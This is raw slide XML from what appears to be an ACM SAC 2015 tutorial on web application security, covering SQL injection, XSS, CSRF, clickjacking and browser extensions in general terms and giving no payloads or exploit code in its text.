          </a:p>
          <a:p>
            <a:pPr marL="561340" lvl="1" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="355"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="560705" algn="l"/>
                <a:tab pos="561340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Clickjacking attack and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="409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Part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-4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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IV</a:t>
            </a:r>
            <a:endParaRPr sz="18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400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr sz="16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384"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-170" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extension</a:t>
            </a:r>
            <a:endParaRPr sz="16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380"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84375"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652145" algn="l"/>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420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Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="18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93061" y="654811"/>
            <a:ext cx="650176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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Application security</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerability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9855">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>16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1070102" y="1471676"/>
            <a:ext cx="8058784" cy="3368040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287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="66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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-3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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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programs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF33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FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>expose </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>alter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-43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information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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="25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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33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attacks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buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="25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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>examples of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-21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vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="24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15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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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(SQLI)</a:t>
            </a:r>
            <a:endParaRPr sz="20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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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(XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="20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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Cross Site Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-19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(CSRF)</a:t>
            </a:r>
            <a:endParaRPr sz="20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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Clickjacking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>we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will discuss in </a:t>
            </a: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Part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-23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III</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="20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42007" y="781304"/>
            <a:ext cx="63766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SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>(SQLI)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724916" y="6954222"/>
            <a:ext cx="1052195" cy="2019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z="1200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:endParaRPr sz="1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3902" y="1693418"/>
            <a:ext cx="7958455" cy="3063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6385" marR="69850" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="2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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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properly  validated</a:t>
            </a:r>
            <a:endParaRPr sz="20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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Intended</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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structure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="4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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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queries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-105" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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altered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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during</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45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program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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runtime</a:t>
            </a:r>
            <a:endParaRPr sz="20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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="1176020" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Exploitation of SQLI vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-285" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>unwanted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-1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consequences</a:t>
            </a:r>
            <a:endParaRPr sz="20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450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1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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bypassing</a:t>
            </a:r>
            <a:endParaRPr sz="18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430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1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Leakage of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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information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022333" y="6791196"/>
            <a:ext cx="1949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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>17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07717" y="616711"/>
            <a:ext cx="659701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Legitimate access </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>account </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="150" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972311" y="1191006"/>
            <a:ext cx="8171688" cy="477392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707639" y="6324091"/>
            <a:ext cx="47218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0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a: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Online </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>BookStore,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://gotocode.com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18</a:t>
            </a:fld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07717" y="664718"/>
            <a:ext cx="659701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Legitimate access </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>account </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="150" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557783" y="1290827"/>
            <a:ext cx="8943593" cy="519150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19</a:t>
            </a:fld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964940" y="616711"/>
            <a:ext cx="197675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Background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93902" y="1434338"/>
            <a:ext cx="7722234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95"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0B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2000" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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applications</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95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accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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both</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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hackers</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constant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106916" y="6791196"/>
            <a:ext cx="11048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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="12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72516" y="6787386"/>
            <a:ext cx="10521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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:endParaRPr sz="12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24533" y="2057400"/>
            <a:ext cx="2057400" cy="180060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092952" y="2140458"/>
            <a:ext cx="2212848" cy="156743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2594101" y="6401053"/>
            <a:ext cx="50057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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.internetlivestats.com/watch/websites/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160025" y="4259826"/>
            <a:ext cx="46221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onstantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Currently</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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there</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-1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billion+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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available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733800" y="4800600"/>
            <a:ext cx="2464307" cy="149351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13486" y="664718"/>
            <a:ext cx="847979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Access </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>account </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="225" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1466849"/>
            <a:ext cx="8534400" cy="452094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20</a:t>
            </a:fld>
            <a:endParaRPr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238503" y="664718"/>
            <a:ext cx="773557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Access through </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>an SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>(step</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="190" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557783" y="1290827"/>
            <a:ext cx="8943593" cy="519150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21</a:t>
            </a:fld>
            <a:endParaRPr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941067" y="616711"/>
            <a:ext cx="633158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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of JSP </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1474469"/>
            <a:ext cx="0" cy="3134995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3134995">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3134868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220200" y="1474469"/>
            <a:ext cx="0" cy="3134995"/>
          </a:xfrm>
          <a:custGeom>
